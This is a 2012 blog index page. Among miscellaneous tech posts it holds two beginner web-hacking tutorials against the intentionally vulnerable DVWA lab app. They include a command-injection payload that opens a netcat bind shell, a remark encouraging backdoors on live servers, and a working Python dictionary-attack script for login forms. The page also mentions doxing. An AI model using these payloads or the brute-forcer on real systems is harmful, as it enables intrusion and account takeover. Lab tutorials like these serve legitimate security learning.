Monday 6 February 2012
One of the Largest Bittorrent Search Engine BTJunkie Shuts Down
BTJunkie.org, one of the largest bittorrent index and search engine, has been shut down by the site operators today. The major reason for shutdown is the legal actions taken on other file sharing websites such as thepiratebay and megaupload.
BTJunkie has been one of the biggest bittorrent search engine which came in the torrent scene since 2005. Personally, BTJunkie was #1 source of torrent stuffs for me and I'll definitely miss BTJunkie and I think so will many internet and torrent users.
The official website of BTJunkie is now showing a goodbye message which writes:
This is the end of the line my friends. The decision does not come easy, but we've decided to voluntarily shut down. We've been fighting for years for your right to communicate, but it's time to move on. It's been an experience of a lifetime, we wish you all the best!
Read more...
BTJunkie has been one of the biggest bittorrent search engine which came in the torrent scene since 2005. Personally, BTJunkie was #1 source of torrent stuffs for me and I'll definitely miss BTJunkie and I think so will many internet and torrent users.
The official website of BTJunkie is now showing a goodbye message which writes:
This is the end of the line my friends. The decision does not come easy, but we've decided to voluntarily shut down. We've been fighting for years for your right to communicate, but it's time to move on. It's been an experience of a lifetime, we wish you all the best!
R.I.P. BTJunkie
Read more...
Bookmark this post: | 
|
Thursday 2 February 2012
How To View Actual Full URL Of bit.ly URLs
URL shortenings are being widely used these days however one problem with them is possibility that the actual link might be some kind of malware or spam. So it is always a good practice to know the actual URLs the bit.ly URLs are pointing to. I am writing this post to share a short tip on how to view the actual URL of bit.ly shortened URLs.
The process is pretty simple and all you have to do is add a + character at the end of the bit.ly URL and open it in the browser. For example, if I have a URL http://bit.ly/xsbGUp, I will change it to bit.ly/xsbGUp+ and open this new URL in the browser. Then I'll be able to get information regarding this particular URL including the actual long link of that shortened URL. Alternatively, you can load bit.ly/info/xsbGUp to get the same information regarding the shortened URL. I hope this post becomes useful for you. :)
Read more...
The process is pretty simple and all you have to do is add a + character at the end of the bit.ly URL and open it in the browser. For example, if I have a URL http://bit.ly/xsbGUp, I will change it to bit.ly/xsbGUp+ and open this new URL in the browser. Then I'll be able to get information regarding this particular URL including the actual long link of that shortened URL. Alternatively, you can load bit.ly/info/xsbGUp to get the same information regarding the shortened URL. I hope this post becomes useful for you. :)
Read more...
Bookmark this post: |
|
Command Execution Vulnerability - Damn Vulnerable Web App Part 2
We had earlier worked out the bruteforce vulnerability in dvwa in part 1 of the series of articles on dvwa. Today, in this second part, we will be exploiting the command execution vulnerability within dvwa.
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
Bookmark this post: |
|
Brute Force Vulnerability - Damn Vulnerable Web App Part 1
Welcome to the part 1 of the web hacking series based on damn vulnerable web application. I will be guiding all the beginners through the various web hacking technologies by using the open source DVWA application. I would like to suggest to try things on your own before reading all of these tutorials and you could actually use these series of tutorial as walkthroughs.
By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.
In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.
*** For some reason, code looks ugly but copy/paste will work perfectly. ***
A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.
1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.
2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.
3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.
4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:
5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:
6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:
8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.
Read more...
By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.
In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.
*** For some reason, code looks ugly but copy/paste will work perfectly. ***
A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.
1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.
2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.
3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.
users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")
4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
req = urllib2.Request(url)
req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
response = urllib2.urlopen(req)
html = response.read()
6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
#!/usr/bin/python
import urllib2
users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
req = urllib2.Request(url)
req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
response = urllib2.urlopen(req)
html = response.read()
if "Username and/or password incorrect." not in html:
print "Working combination --- %s : %s" %(user, password)
7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:
samar@Techgaun:~/Desktop$ python bruteforce.py
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$
8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.
Read more...
Bookmark this post: |
|
Saturday 28 January 2012
KDE Version 4.8 Is Released With Updated Plasma Workspaces, Apps n Platforms
On 25th January 2012, KDE has released 4.8.0, containing compelling new features and improvements to the Plasma Workspaces, the KDE Applications and the KDE Development Platform. Version 4.8 is intended to provide many new features, and improved stability and performance.
Major KDE improvements in this version are:
Adaptive Power Management - Kwin optimizations, the redesign of power management, and integration with Activities.
Faster, More Scalable File Management - KDE v. 4.8 includes Dolphin with its new display engine, new Kate features and improvements, Gwenview with functional and visual improvements.
Enhanced Interoperability & Introduction of Touch-Friendly Components
Check the official announcement
Read more...
Major KDE improvements in this version are:
Adaptive Power Management - Kwin optimizations, the redesign of power management, and integration with Activities.
Faster, More Scalable File Management - KDE v. 4.8 includes Dolphin with its new display engine, new Kate features and improvements, Gwenview with functional and visual improvements.
Enhanced Interoperability & Introduction of Touch-Friendly Components
Check the official announcement
Read more...
Bookmark this post: |
|
Sunday 22 January 2012
Useful Sites To Mass Check Availability Of Username In Many Social Networking Sites
Sorry for not posting for long time. This sinusitis is killing my cells. Anyway I thought to share two useful websites that can be used to check the availability of the username in numerous social networking sites at once.
Two websites that allow checking availability of username and vanity URL are:
a) Namechk.com
b) Knowem.com
These two websites will perform mass lookup for the presence of given username in hundreds of social networking and social bookmarking websites. Also, the above provided links can be used in the process of doxing(Doxing is a technique of tracing someone or gather information about an individual using sources on the internet. - from urbandictionary).
Read more...
Two websites that allow checking availability of username and vanity URL are:
a) Namechk.com
b) Knowem.com
These two websites will perform mass lookup for the presence of given username in hundreds of social networking and social bookmarking websites. Also, the above provided links can be used in the process of doxing(Doxing is a technique of tracing someone or gather information about an individual using sources on the internet. - from urbandictionary).
Read more...
Bookmark this post: |
|
Tuesday 17 January 2012
Watch ASCII Star Wars Through Telnet
Just thought to share this cool link that features a star wars in the telnet. Telnet to the remote server and you'll be shown the star wars story.
Open your terminal and type the following:
And, the online web version is available at HERE
Read more...
Open your terminal and type the following:
telnet towel.blinkenlights.nl
And, the online web version is available at HERE
Read more...
Bookmark this post: |
|
Monday 16 January 2012
Things I Use CLI Rather Than GUI For
Today I am sharing the things I do not use or do not like to use graphical user interface(GUI) instead I stick to command line. I use the following commands instead of their graphical counterpart as the command line way is faster and easier.
1) Combine MP3 files(songs)
I frequently combine mp3 files into a single one to hear what I record in my laptop. The cat command is enough to combine two or more MP3 files into a single one. Below is a sample command:
2) Monitor Memory Usage
I usually find myself typing top command in the terminal instead of opening system monitor when I need to see what is clogging up my CPU. I also use powertop command to view power consumption of my laptop so that I can get suggestions to increase the battery life.
3) Resize images
This is another thing I use command line instead of GUI, for. I find using the mogrify and convert commands from imagemagick packages easier than graphical interface esp. when I need to batch resize the images to a specified size. Please refer to my blog post in these commands.
4) Video Conversion Using ffmpeg
I frequently convert the videos using the commandline ffmpeg utility. The general syntax is quite easier to remember. An example below will clarify things.
Play with different video formats as per your requirement.
5) Edit Text Files
I usually find myself opening nano editor while editing the text files. Of course, using the lightweight GUI tools like gedit would be more easier and reliable. However, maybe due to the fact that I work a lot of times over SSh, I find using nano to edit textual files.
6) Install Softwares and Perform Updates and Upgrades
Whenever I need to install a software, or perform updates and upgrades, I am used to with the command line apt-get utility.
Install a software package
Perform release upgrade
7) Mirror A Website
Mirroring a website is a lot easier with wget command and I frequently use this. The simplest form is as below but be sure to check the MAN page and help for wget command to know more options available.
In the above example, m means mirror and k refers to local hyperlinking and w is for maintaing proper delay time so that the remote server does not get overloaded.
So these are some of the stuffs I like to do using command line rather than GUI. Share yours...
Read more...
1) Combine MP3 files(songs)
I frequently combine mp3 files into a single one to hear what I record in my laptop. The cat command is enough to combine two or more MP3 files into a single one. Below is a sample command:
cat input1.mp3 input2.mp3 > output.mp3
2) Monitor Memory Usage
I usually find myself typing top command in the terminal instead of opening system monitor when I need to see what is clogging up my CPU. I also use powertop command to view power consumption of my laptop so that I can get suggestions to increase the battery life.
3) Resize images
This is another thing I use command line instead of GUI, for. I find using the mogrify and convert commands from imagemagick packages easier than graphical interface esp. when I need to batch resize the images to a specified size. Please refer to my blog post in these commands.
4) Video Conversion Using ffmpeg
I frequently convert the videos using the commandline ffmpeg utility. The general syntax is quite easier to remember. An example below will clarify things.
ffmpeg -i inputvideo.mp4 outputvideo.avi
Play with different video formats as per your requirement.
5) Edit Text Files
I usually find myself opening nano editor while editing the text files. Of course, using the lightweight GUI tools like gedit would be more easier and reliable. However, maybe due to the fact that I work a lot of times over SSh, I find using nano to edit textual files.
nano file.txt
6) Install Softwares and Perform Updates and Upgrades
Whenever I need to install a software, or perform updates and upgrades, I am used to with the command line apt-get utility.
Install a software package
sudo apt-get install package1 package2 ... packagen
Perform release upgrade
sudo do-release-upgrade
7) Mirror A Website
Mirroring a website is a lot easier with wget command and I frequently use this. The simplest form is as below but be sure to check the MAN page and help for wget command to know more options available.
wget -mk -w 4 http://www.site.com/
In the above example, m means mirror and k refers to local hyperlinking and w is for maintaing proper delay time so that the remote server does not get overloaded.
So these are some of the stuffs I like to do using command line rather than GUI. Share yours...
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)